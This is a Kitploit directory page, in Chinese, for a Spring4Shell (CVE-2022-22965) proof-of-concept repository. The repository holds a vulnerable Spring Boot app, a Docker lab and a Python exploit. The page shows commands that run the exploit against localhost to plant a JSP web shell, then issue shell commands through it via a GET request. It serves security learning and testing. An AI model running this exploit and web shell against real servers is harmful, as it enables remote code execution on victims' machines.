Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-22965 — CVE-2022-22965 (Spring4Shell) 的验证性利用程序,包含一个存在漏洞的 Spring Boot 应用程序、Python 漏洞利用脚本以及基于 Docker 的测试实验环境。 | Kitploit
工具/GitHubGitHub/mariomamo/cve-2022-22965
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubmariomamo/cve-2022-22965

CVE-2022-22965

CVE-2022-22965 (Spring4Shell) 的验证性利用程序,包含一个存在漏洞的 Spring Boot 应用程序、Python 漏洞利用脚本以及基于 Docker 的测试实验环境。

查看仓库
5114年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

👾 CVE-2022-22965

这是一个针对 CVE-2022-22965 (spring4shell) 漏洞的概念验证利用程序。 它由以下部分组成:

  • 一个存在漏洞的 Springboot 应用程序;
  • 一个用 Python 编写的漏洞利用脚本;
  • 一个用于测试漏洞利用不起作用的安全应用;
  • 一个用于运行存在漏洞的应用程序并测试漏洞利用的 Dockerfile;

🔧 贡献者

  • [🇮🇹] Mario Offertucci;
  • [🇮🇹] Antonio Donnarumma。

⚙️ 先决条件

  • Docker:用于运行带有 Springboot 应用程序的 Tomcat 容器;
  • Python:用于运行漏洞利用脚本;

1️⃣ 运行 Springboot 应用程序

在项目根文件夹中有一个 Dockerfile,它会创建一个 Tomcat 镜像,并将 vulnerable_app/target/spring4shell.war 和 safe_app/target/safeapp.war 文件复制到 /usr/local/tomcat/webapps 文件夹中,因此你只需构建镜像并启动容器即可。

构建 Tomcat 镜像

root@kitploit:~
docker build -t cve_2022_22965 .

启动容器

root@kitploit:~
docker run -p 8080:8080 -d --name springshell cve_2022_22965

检查应用程序是否响应

root@kitploit:~
curl --location --request POST http://localhost:8080/spring4shell/vulnerability/exploit?name=Elliot%20Alderson

如果你看到以下响应

root@kitploit:~
This is Elliot Alderson

则应用程序已启动并运行。

2️⃣ 现在你可以运行漏洞利用脚本

root@kitploit:~
cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit

你还可以选择指定注入的 JSP 文件名,但这并非强制要求。 示例

root@kitploit:~
cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit -f exploit.jsp

如果你未指定文件名,则会生成一个随机名称。

你将在命令 shell 中看到以下内容
在漏洞利用之后,你也可以通过 HTTP GET 请求发送命令

root@kitploit:~
http://localhost:8080/exploit.jsp?pwd=pass&cmd=ls

你已成功在受害机器上打开了一个 shell!尽情享受吧!

下载工具